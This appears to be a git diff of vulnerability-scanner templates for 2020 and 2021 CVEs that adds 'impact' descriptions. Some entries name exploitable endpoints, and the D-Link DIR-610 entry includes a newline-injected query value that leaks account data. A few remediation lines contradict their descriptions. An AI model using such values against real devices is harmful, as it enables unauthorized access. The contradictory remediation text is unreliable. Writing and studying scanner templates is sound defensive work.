@@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: HPE Smart Update Manager (SUM) prior to version 8.5.6 could allow remote unauthorized access. + impact: | + An attacker can gain unauthorized access to the HPE Smart Update Manager, potentially leading to further compromise of the system. remediation: Hewlett Packard Enterprise has provided a software update to resolve this vulnerability in HPE Smart Update Manager (SUM) prior to 8.5.6. Please visit the HPE Support Center at https://support.hpe.com/hpesc/public/home to download the latest version of HPE Smart Update Manager (SUM). Download the latest version of HPE Smart Update Manager (SUM) or download the latest Service Pack For ProLiant (SPP). reference: - https://www.tenable.com/security/research/tra-2020-02 diff --git a/http/cves/2020/CVE-2020-7209.yaml b/http/cves/2020/CVE-2020-7209.yaml index 7c0184145b..5fa9038430 100644 --- a/http/cves/2020/CVE-2020-7209.yaml +++ b/http/cves/2020/CVE-2020-7209.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: LinuxKI v6.0-1 and earlier are vulnerable to remote code execution. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system. remediation: This is resolved in release 6.0-2. reference: - http://packetstormsecurity.com/files/157739/HP-LinuxKI-6.01-Remote-Command-Injection.html diff --git a/http/cves/2020/CVE-2020-7318.yaml b/http/cves/2020/CVE-2020-7318.yaml index bce0682f83..fc5a4b9b69 100644 --- a/http/cves/2020/CVE-2020-7318.yaml +++ b/http/cves/2020/CVE-2020-7318.yaml 
@@ -10,6 +10,8 @@ info: - https://swarm.ptsecurity.com/vulnerabilities-in-mcafee-epolicy-orchestrator/ - https://kc.mcafee.com/corporate/index?page=content&id=SB10332 - https://nvd.nist.gov/vuln/detail/CVE-2020-7318 + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking or unauthorized actions. remediation: | Upgrade to McAfee ePolicy Orchestrator version 5.10.9 Update 9 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-7796.yaml b/http/cves/2020/CVE-2020-7796.yaml index 969276a9e4..fca04fdb59 100644 --- a/http/cves/2020/CVE-2020-7796.yaml +++ b/http/cves/2020/CVE-2020-7796.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7 is susceptible to server-side request forgery when WebEx zimlet is installed and zimlet JSP is enabled. + impact: | + Successful exploitation of this vulnerability could allow an attacker to send arbitrary requests from the vulnerable server, potentially leading to unauthorized access or data leakage. remediation: | Apply the latest patch or upgrade to Zimbra Collaboration Suite version 8.8.15 Patch 7 or higher to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-7943.yaml b/http/cves/2020/CVE-2020-7943.yaml index f504fdbaaf..1e79c2e632 100644 --- a/http/cves/2020/CVE-2020-7943.yaml +++ b/http/cves/2020/CVE-2020-7943.yaml 
@@ -5,6 +5,8 @@ info: author: c-sh0 severity: high description: Puppet Server and PuppetDB provide useful performance and debugging information via their metrics API endpoints, which may contain sensitive information when left exposed. + impact: | + An attacker can exploit this vulnerability to gain access to sensitive information stored in Puppet Server/PuppetDB. remediation: | Apply the necessary patches or updates provided by Puppet to fix the vulnerability and ensure sensitive information is properly protected. reference: diff --git a/http/cves/2020/CVE-2020-7980.yaml b/http/cves/2020/CVE-2020-7980.yaml index 3d4eae03d0..780bb43480 100644 --- a/http/cves/2020/CVE-2020-7980.yaml +++ b/http/cves/2020/CVE-2020-7980.yaml @@ -5,6 +5,8 @@ info: author: ritikchaddha severity: critical description: 'Intellian Aptus Web 1.24 allows remote attackers to execute arbitrary OS commands via the Q field within JSON data to the cgi-bin/libagent.cgi URI. NOTE: a valid sid cookie for a login to the intellian default account might be needed.' + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system. remediation: | Upgrade to a patched version of Satellian Intellian Aptus Web (version > 1.24). reference: diff --git a/http/cves/2020/CVE-2020-8115.yaml b/http/cves/2020/CVE-2020-8115.yaml index 3749038f95..ea4f8fdbf0 100644 --- a/http/cves/2020/CVE-2020-8115.yaml +++ b/http/cves/2020/CVE-2020-8115.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Revive Adserver 5.0.3 and prior contains a reflected cross-site scripting vulnerability in the publicly accessible afr.php delivery script. In older versions, it is possible to steal the session identifier and gain access to the admin interface. The query string sent to the www/delivery/afr.php script is printed back without proper escaping, allowing an attacker to execute arbitrary JavaScript code on the browser of the victim. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: There are currently no known exploits. As of 3.2.2, the session identifier cannot be accessed as it is stored in an http-only cookie. reference: - https://hackerone.com/reports/775693 diff --git a/http/cves/2020/CVE-2020-8163.yaml b/http/cves/2020/CVE-2020-8163.yaml index 33e6362f3d..aac25ab0e1 100644 --- a/http/cves/2020/CVE-2020-8163.yaml +++ b/http/cves/2020/CVE-2020-8163.yaml @@ -5,6 +5,8 @@ info: author: tim_koopmans severity: high description: Ruby on Rails before version 5.0.1 is susceptible to remote code execution because it passes user parameters as local variables into partials. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized remote code execution. remediation: | Upgrade Ruby on Rails to version 5.0.1 or above. reference: diff --git a/http/cves/2020/CVE-2020-8191.yaml b/http/cves/2020/CVE-2020-8191.yaml index 796bf3c510..fc52f6097a 100644 --- a/http/cves/2020/CVE-2020-8191.yaml +++ b/http/cves/2020/CVE-2020-8191.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 contain a cross-site scripting vulnerability due to improper input validation. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the necessary security patches or updates provided by Citrix to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-8193.yaml b/http/cves/2020/CVE-2020-8193.yaml index 4ef601175c..b4df22a72f 100644 --- a/http/cves/2020/CVE-2020-8193.yaml +++ b/http/cves/2020/CVE-2020-8193.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: medium description: Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 are vulnerable to local file inclusion because they allow unauthenticated access to certain URL endpoints. + impact: | + An attacker can access sensitive information stored on the server, potentially leading to further exploitation or unauthorized access. remediation: | Apply the latest security patches or updates provided by Citrix to fix the local file inclusion vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-8194.yaml b/http/cves/2020/CVE-2020-8194.yaml index 41519acb3f..bb98811603 100644 --- a/http/cves/2020/CVE-2020-8194.yaml +++ b/http/cves/2020/CVE-2020-8194.yaml 
@@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: medium description: Citrix ADC and NetScaler Gateway are susceptible to remote code injection. An attacker can potentially execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. Affected versions are before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18. Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allow modification of a file download. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the necessary security patches or updates provided by Citrix to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-8209.yaml b/http/cves/2020/CVE-2020-8209.yaml index 1693837ae1..1d910a5908 100644 --- a/http/cves/2020/CVE-2020-8209.yaml +++ b/http/cves/2020/CVE-2020-8209.yaml @@ -10,6 +10,8 @@ info: - https://swarm.ptsecurity.com/path-traversal-on-citrix-xenmobile-server/ - https://support.citrix.com/article/CTX277457 - https://nvd.nist.gov/vuln/detail/CVE-2020-8209 + impact: | + An attacker can access sensitive information stored on the server, potentially leading to further compromise or unauthorized access. remediation: | Apply the latest security patches or updates provided by Citrix to fix the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-8497.yaml b/http/cves/2020/CVE-2020-8497.yaml index f3c0072771..ef36db51a9 100644 --- a/http/cves/2020/CVE-2020-8497.yaml +++ b/http/cves/2020/CVE-2020-8497.yaml 
@@ -5,6 +5,8 @@ info: author: gy741 severity: medium description: Artica Pandora FMS through 7.42 is susceptible to arbitrary file read. An attacker can read the chat history, which is in JSON format and contains user names, user IDs, private messages, and timestamps. This can potentially lead to unauthorized data modification and other operations. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, potentially leading to further compromise of the system. remediation: | Upgrade Artica Pandora FMS to version 7.43 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-8512.yaml b/http/cves/2020/CVE-2020-8512.yaml index 50538af251..62ad9fb302 100644 --- a/http/cves/2020/CVE-2020-8512.yaml +++ b/http/cves/2020/CVE-2020-8512.yaml @@ -5,6 +5,8 @@ info: author: pdteam,dwisiswant0 severity: medium description: IceWarp Webmail Server through 11.4.4.1 contains a cross-site scripting vulnerability in the /webmail/ color parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, data theft, or other malicious activities. remediation: | Upgrade to a patched version of IceWarp WebMail Server (>=11.4.4.2) or apply the vendor-provided patch to mitigate the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-8515.yaml b/http/cves/2020/CVE-2020-8515.yaml index 56842f7dd0..e24ce06231 100644 --- a/http/cves/2020/CVE-2020-8515.yaml +++ b/http/cves/2020/CVE-2020-8515.yaml 
@@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices allow remote code execution as root (without authentication) via shell metacharacters to the cgi-bin/mainfunction.cgi URI. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected router, leading to complete compromise of the device and potential unauthorized access to the network. remediation: This issue has been fixed in Vigor3900/2960/300B v1.5.1. reference: - https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515) diff --git a/http/cves/2020/CVE-2020-8641.yaml b/http/cves/2020/CVE-2020-8641.yaml index e94584809d..822045a608 100644 --- a/http/cves/2020/CVE-2020-8641.yaml +++ b/http/cves/2020/CVE-2020-8641.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Lotus Core CMS 1.0.1 allows authenticated local file inclusion of .php files via directory traversal in the index.php page_slug parameter. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system. remediation: | Apply the latest security patch or update to Lotus Core CMS 1.0.1 to fix the LFI vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-8644.yaml b/http/cves/2020/CVE-2020-8644.yaml index c53f839a85..ad161e4e0c 100644 --- a/http/cves/2020/CVE-2020-8644.yaml +++ b/http/cves/2020/CVE-2020-8644.yaml 
@@ -5,6 +5,8 @@ info: author: dbrwsky severity: critical description: PlaySMS before version 1.4.3 is susceptible to remote code execution because it double processes a server-side template. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system. remediation: | Upgrade playSMS to version 1.4.4 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-8654.yaml b/http/cves/2020/CVE-2020-8654.yaml index e166b0db52..584d6f8e9d 100644 --- a/http/cves/2020/CVE-2020-8654.yaml +++ b/http/cves/2020/CVE-2020-8654.yaml @@ -5,6 +5,8 @@ info: author: praetorian-thendrickson severity: high description: EyesOfNetwork 5.1 to 5.3 contains SQL injection and remote code execution vulnerabilities. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. See also CVE-2020-8655, CVE-2020-8656, CVE-2020-8657, and CVE-2020-9465. + impact: | + Successful exploitation of these vulnerabilities could allow an attacker to execute arbitrary SQL queries or remote code on the affected system. remediation: | Upgrade to a patched version of EyesOfNetwork or apply the necessary security patches to mitigate the vulnerabilities. reference: diff --git a/http/cves/2020/CVE-2020-8771.yaml b/http/cves/2020/CVE-2020-8771.yaml index b4159f8a34..8c32131776 100644 --- a/http/cves/2020/CVE-2020-8771.yaml +++ b/http/cves/2020/CVE-2020-8771.yaml 
@@ -5,6 +5,8 @@ info: author: princechaddha severity: critical description: WordPress Time Capsule plugin before 1.21.16 for WordPress has an authentication bypass. Any request containing IWP_JSON_PREFIX causes the client to be logged in as the first account on the list of administrator accounts. + impact: | + An attacker can bypass authentication and gain unauthorized access to the WordPress Time Capsule plugin. remediation: | Update WordPress Time Capsule plugin to version 1.21.16 or later. reference: diff --git a/http/cves/2020/CVE-2020-8772.yaml b/http/cves/2020/CVE-2020-8772.yaml index 9f70f098a3..88f3572bd0 100644 --- a/http/cves/2020/CVE-2020-8772.yaml +++ b/http/cves/2020/CVE-2020-8772.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress InfiniteWP plugin before 1.9.4.5 for WordPress contains an authorization bypass vulnerability via a missing authorization check in iwp_mmb_set_request in init.php. An attacker who knows the username of an administrator can log in, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can gain unauthorized administrative access to the WordPress site. remediation: Upgrade to InfiniteWP 1.9.4.5 or higher. reference: - https://wpscan.com/vulnerability/10011 diff --git a/http/cves/2020/CVE-2020-8813.yaml b/http/cves/2020/CVE-2020-8813.yaml index d7b8500443..658aec960e 100644 --- a/http/cves/2020/CVE-2020-8813.yaml +++ b/http/cves/2020/CVE-2020-8813.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: high description: Cacti v1.2.8 is susceptible to remote code execution. This vulnerability could be exploited without authentication if "Guest Realtime Graphs" privileges are enabled. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade to a patched version of Cacti v1.2.9 or later to mitigate this vulnerability. reference: 
diff --git a/http/cves/2020/CVE-2020-8982.yaml b/http/cves/2020/CVE-2020-8982.yaml index f6b2e7de79..4982604ebf 100644 --- a/http/cves/2020/CVE-2020-8982.yaml +++ b/http/cves/2020/CVE-2020-8982.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: high description: Citrix ShareFile StorageZones (aka storage zones) Controller versions through at least 5.10.x are susceptible to an unauthenticated arbitrary file read vulnerability. + impact: | + An attacker can read arbitrary files on the affected system, potentially leading to unauthorized access to sensitive information. remediation: | Upgrade Citrix ShareFile StorageZones to version 5.11 or higher to mitigate the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-9036.yaml b/http/cves/2020/CVE-2020-9036.yaml index b47c3ae446..55385650ca 100644 --- a/http/cves/2020/CVE-2020-9036.yaml +++ b/http/cves/2020/CVE-2020-9036.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Jeedom through 4.0.38 contains a cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade Jeedom to version 4.0.39 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-9043.yaml b/http/cves/2020/CVE-2020-9043.yaml index c2d504a9fa..98fbafbc2d 100644 --- a/http/cves/2020/CVE-2020-9043.yaml +++ b/http/cves/2020/CVE-2020-9043.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | WordPress wpCentral plugin before 1.5.1 is susceptible to information disclosure. An attacker can access the connection key for WordPress Admin account and thus potentially obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain sensitive information from the wpCentral plugin. remediation: | Update the wpCentral plugin to version 1.5.1 or later to fix the information disclosure vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-9047.yaml b/http/cves/2020/CVE-2020-9047.yaml index 92307bd5b9..9123d93a9e 100644 --- a/http/cves/2020/CVE-2020-9047.yaml +++ b/http/cves/2020/CVE-2020-9047.yaml @@ -6,6 +6,8 @@ info: severity: high description: | exacqVision Web Service is susceptible to remote code execution which could allow the execution of unauthorized code or operating system commands on systems running exacqVision Web Service versions 20.06.3.0 and prior and exacqVision Enterprise Manager versions 20.06.4.0 and prior. An attacker with administrative privileges could potentiallydownload and run a malicious executable that could allow OS command injection on the system. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patch or update provided by the vendor to fix the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-9054.yaml b/http/cves/2020/CVE-2020-9054.yaml index d939ef62f2..e75d83a27b 100644 --- a/http/cves/2020/CVE-2020-9054.yaml +++ b/http/cves/2020/CVE-2020-9054.yaml 
@@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: critical description: 'Multiple Zyxel network-attached storage (NAS) devices running firmware version 5.21 contain a pre-authentication command injection vulnerability, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable device. Zyxel NAS devices achieve authentication by using the weblogin.cgi CGI executable. This program fails to properly sanitize the username parameter that is passed to it. If the username parameter contains certain characters, it can allow command injection with the privileges of the web server that runs on the Zyxel device. Although the web server does not run as the root user, Zyyxel devices include a setuid utility that can be leveraged to run any command with root privileges. As such, it should be assumed that exploitation of this vulnerability can lead to remote code execution with root privileges. By sending a specially-crafted HTTP POST or GET request to a vulnerable Zyyxel device, a remote, unauthenticated attacker may be able to execute arbitrary code on the device. This may happen by directly connecting to a device if it is directly exposed to an attacker. However, there are ways to trigger such crafted requests even if an attacker does not have direct connectivity to a vulnerable devices. For example, simply visiting a website can result in the compromise of any Zyyxel device that is reachable from the client system. Affected products include: NAS326 before firmware V5.21(AAZF.7)C0 NAS520 before firmware V5.21(AASZ.3)C0 NAS540 before firmware V5.21(AATB.4)C0 NAS542 before firmware V5.21(ABAG.4)C0 Zyyxel has made firmware updates available for NAS326, NAS520, NAS540, and NAS542 devices. Affected models that are end-of-support: NSA210, NSA220, NSA220+, NSA221, NSA310, NSA310S, NSA320, NSA320S, NSA325 and NSA325v2.' 
+ impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected device. remediation: | Apply the latest firmware update provided by Zyxel to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-9315.yaml b/http/cves/2020/CVE-2020-9315.yaml index 97a2b479ba..282c4a7864 100644 --- a/http/cves/2020/CVE-2020-9315.yaml +++ b/http/cves/2020/CVE-2020-9315.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Oracle iPlanet Web Server 7.0.x has incorrect access control for admingui/version URIs in the Administration console, as demonstrated by unauthenticated read access to encryption keys. NOTE a related support policy can be found in the www.oracle.com references attached to this CVE. + impact: | + Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the affected system. remediation: | Apply the necessary patches or updates provided by Oracle to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-9344.yaml b/http/cves/2020/CVE-2020-9344.yaml index 636e3f7b4a..ffac922deb 100644 --- a/http/cves/2020/CVE-2020-9344.yaml +++ b/http/cves/2020/CVE-2020-9344.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: medium description: Jira Subversion ALM for Enterprise before 8.8.2 contains a cross-site scripting vulnerability at multiple locations. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions. remediation: | Upgrade Jira Subversion ALM for Enterprise to version 8.8.2 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-9376.yaml b/http/cves/2020/CVE-2020-9376.yaml index 311de84011..69601b716f 100644 --- a/http/cves/2020/CVE-2020-9376.yaml +++ b/http/cves/2020/CVE-2020-9376.yaml 
@@ -7,6 +7,8 @@ info: description: | D-Link DIR-610 devices allow information disclosure via SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1 to getcfg.php. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. + impact: | + An attacker can gain sensitive information from the device, leading to potential unauthorized access or further attacks. remediation: | Apply the latest firmware update provided by D-Link to fix the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-9402.yaml b/http/cves/2020/CVE-2020-9402.yaml index 44c5606cec..0df83e41ac 100644 --- a/http/cves/2020/CVE-2020-9402.yaml +++ b/http/cves/2020/CVE-2020-9402.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: high description: Django 1.11 before 1.11.29, 2.2 before 2.2.11, and 3.0 before 3.0.4 allow SQL injection if untrusted data is used as a tolerance parameter in GIS functions and aggregates on Oracle. By passing a suitably crafted tolerance to GIS functions and aggregates on Oracle, it is possible to break character escaping and inject malicious SQL. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: Upgrade to the latest version. reference: - https://www.debian.org/security/2020/dsa-4705 diff --git a/http/cves/2020/CVE-2020-9425.yaml b/http/cves/2020/CVE-2020-9425.yaml index e3811e3404..4b09fd09d2 100644 --- a/http/cves/2020/CVE-2020-9425.yaml +++ b/http/cves/2020/CVE-2020-9425.yaml 
@@ -5,6 +5,8 @@ info: author: madrobot severity: high description: rConfig prior to version 3.9.4 is susceptible to sensitive information disclosure. An unauthenticated attacker can retrieve saved cleartext credentials via a GET request to settings.php. Because the application does not exit after a redirect is applied, the rest of the page still executes, resulting in the disclosure of cleartext credentials in the response. + impact: | + An attacker can exploit this vulnerability to gain access to sensitive information, such as usernames and passwords. remediation: | Upgrade rConfig to version 3.9.4 or later to fix the vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-9483.yaml b/http/cves/2020/CVE-2020-9483.yaml index 58dd7452b9..6852370b54 100644 --- a/http/cves/2020/CVE-2020-9483.yaml +++ b/http/cves/2020/CVE-2020-9483.yaml @@ -6,6 +6,8 @@ info: severity: high description: | When using H2/MySQL/TiDB as Apache SkyWalking storage and a metadata query through GraphQL protocol, there is a SQL injection vulnerability which allows access to unexpected data. Apache SkyWalking 6.0.0 to 6.6.0, 7.0.0 H2/MySQL/TiDB storage implementations don't use the appropriate way to set SQL parameters. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest security patches or updates provided by the SkyWalking project to fix the SQL injection vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-9484.yaml b/http/cves/2020/CVE-2020-9484.yaml index fcaaa6ee5c..393ee8304b 100644 --- a/http/cves/2020/CVE-2020-9484.yaml +++ b/http/cves/2020/CVE-2020-9484.yaml 
@@ -11,6 +11,8 @@ info: c) the PersistenceManager is configured with sessionAttributeValueClassNameFilter="null" (the default unless a SecurityManager is used) or a sufficiently lax filter to allow the attacker provided object to be deserialized; and d) the attacker knows the relative file path from the storage location used by FileStore to the file the attacker has control over; then, using a specifically crafted request, the attacker will be able to trigger remote code execution via deserialization of the file under their control. Note that all of conditions a) to d) must be true for the attack to succeed. + impact: | + Successful exploitation of this vulnerability can lead to remote code execution, allowing attackers to execute arbitrary commands on the affected system. remediation: | Apply the latest security patches provided by Apache to mitigate this vulnerability. reference: diff --git a/http/cves/2020/CVE-2020-9496.yaml b/http/cves/2020/CVE-2020-9496.yaml index d0cb28604c..9403732a17 100644 --- a/http/cves/2020/CVE-2020-9496.yaml +++ b/http/cves/2020/CVE-2020-9496.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: medium description: Apache OFBiz 17.12.03 contains cross-site scripting and unsafe deserialization vulnerabilities via an XML-RPC request. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or upgrade to a non-vulnerable version of Apache OFBiz. reference: diff --git a/http/cves/2020/CVE-2020-9757.yaml b/http/cves/2020/CVE-2020-9757.yaml index 148644ebc1..2e5aa9d671 100644 --- a/http/cves/2020/CVE-2020-9757.yaml +++ b/http/cves/2020/CVE-2020-9757.yaml 
@@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: Craft CMS before 3.3.0 is susceptible to server-side template injection via the SEOmatic component that could lead to remote code execution via malformed data submitted to the metacontainers controller. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the server. remediation: | Upgrade Craft CMS to version 3.3.0 or higher to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-1472.yaml b/http/cves/2021/CVE-2021-1472.yaml index bdeb6668e5..70e68cee11 100644 --- a/http/cves/2021/CVE-2021-1472.yaml +++ b/http/cves/2021/CVE-2021-1472.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Cisco Small Business RV Series routers RV16X/RV26X versions 1.0.01.02 and before and RV34X versions 1.0.03.20 and before contain multiple OS command injection vulnerabilities in the web-based management interface. A remote attacker can execute arbitrary OS commands via the sessionid cookie or bypass authentication and upload files on an affected device. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized remote code execution, compromising the confidentiality, integrity, and availability of the affected device. remediation: | Apply the latest security patches or firmware updates provided by Cisco to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-1498.yaml b/http/cves/2021/CVE-2021-1498.yaml index 058d924a80..6f4f24bcb1 100644 --- a/http/cves/2021/CVE-2021-1498.yaml +++ b/http/cves/2021/CVE-2021-1498.yaml 
@@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: Cisco HyperFlex HX contains multiple vulnerabilities in the web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected system. remediation: | Apply the necessary security patches or updates provided by Cisco to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-1499.yaml b/http/cves/2021/CVE-2021-1499.yaml index 50d16bfb90..5634b6050e 100644 --- a/http/cves/2021/CVE-2021-1499.yaml +++ b/http/cves/2021/CVE-2021-1499.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: medium description: Cisco HyperFlex HX Data Platform contains an arbitrary file upload vulnerability in the web-based management interface. An attacker can send a specific HTTP request to an affected device, thus enabling upload of files to the affected device with the permissions of the tomcat8 user. + impact: | + Allows an attacker to upload and execute arbitrary files on the target system remediation: | Apply the necessary security patches or updates provided by Cisco reference: diff --git a/http/cves/2021/CVE-2021-20038.yaml b/http/cves/2021/CVE-2021-20038.yaml index eed9339c24..83ee258535 100644 --- a/http/cves/2021/CVE-2021-20038.yaml +++ b/http/cves/2021/CVE-2021-20038.yaml 
@@ -5,6 +5,8 @@ info: author: dwisiswant0, jbaines-r7 severity: critical description: A Stack-based buffer overflow vulnerability in SMA100 Apache httpd server's mod_cgi module environment variables allows a remote unauthenticated attacker to potentially execute code as a 'nobody' user in the appliance. This vulnerability affected SMA 200, 210, 400, 410 and 500v appliances firmware 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv and earlier versions. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code or crash the affected system. remediation: | Apply the latest security patch or update provided by SonicWall to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-20090.yaml b/http/cves/2021/CVE-2021-20090.yaml index 100a7fcdce..8c41e2fe27 100644 --- a/http/cves/2021/CVE-2021-20090.yaml +++ b/http/cves/2021/CVE-2021-20090.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 are susceptible to a path traversal vulnerability that could allow unauthenticated remote attackers to bypass authentication in their web interfaces. + impact: | + An attacker can exploit this vulnerability to read sensitive files, such as configuration files, credentials, or other sensitive information. remediation: | Apply the latest firmware update provided by Buffalo to fix the path traversal vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-20091.yaml b/http/cves/2021/CVE-2021-20091.yaml index b64a33fb89..acfe6804ec 100644 --- a/http/cves/2021/CVE-2021-20091.yaml +++ b/http/cves/2021/CVE-2021-20091.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 does not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially leading to remote code execution. + impact: | + An attacker can exploit this vulnerability to inject malicious configuration settings, potentially leading to unauthorized access or control of the router. remediation: | Apply the latest firmware update provided by Buffalo to fix the configuration file injection vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-20092.yaml b/http/cves/2021/CVE-2021-20092.yaml index 13f9912daa..74b746d99a 100644 --- a/http/cves/2021/CVE-2021-20092.yaml +++ b/http/cves/2021/CVE-2021-20092.yaml @@ -6,6 +6,8 @@ info: severity: high description: | The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive information from an unauthorized actor. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to the router's configuration settings and potentially compromise the entire network. remediation: | Apply the latest firmware update provided by Buffalo to fix the access control issue. reference: diff --git a/http/cves/2021/CVE-2021-20114.yaml b/http/cves/2021/CVE-2021-20114.yaml index fe329b1341..4ea64c10f1 100644 --- a/http/cves/2021/CVE-2021-20114.yaml +++ b/http/cves/2021/CVE-2021-20114.yaml 
